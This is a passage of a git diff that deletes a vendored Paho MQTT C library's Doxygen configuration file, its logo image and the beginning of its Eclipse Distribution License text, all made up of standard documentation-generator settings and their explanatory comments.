-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          = org.doxygen.Project
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = NO
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             =
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = YES
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = NO
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = NO
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 1000
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = YES
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/pahologo.png b/thirdparty/paho.mqtt.c/doc/pahologo.png
deleted file mode 100644
index 27f197d..0000000
--- a/thirdparty/paho.mqtt.c/doc/pahologo.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/paho.mqtt.c/edl-v10 b/thirdparty/paho.mqtt.c/edl-v10
deleted file mode 100644
index cf989f1..0000000
--- a/thirdparty/paho.mqtt.c/edl-v10
+++ /dev/null
@@ -1,15 +0,0 @@
-
-Eclipse Distribution License - v 1.0
-
-Copyright (c) 2007, Eclipse Foundation, Inc. and its licensors.
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-
-    Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-    Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-    Neither the name of the Eclipse Foundation, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 
-
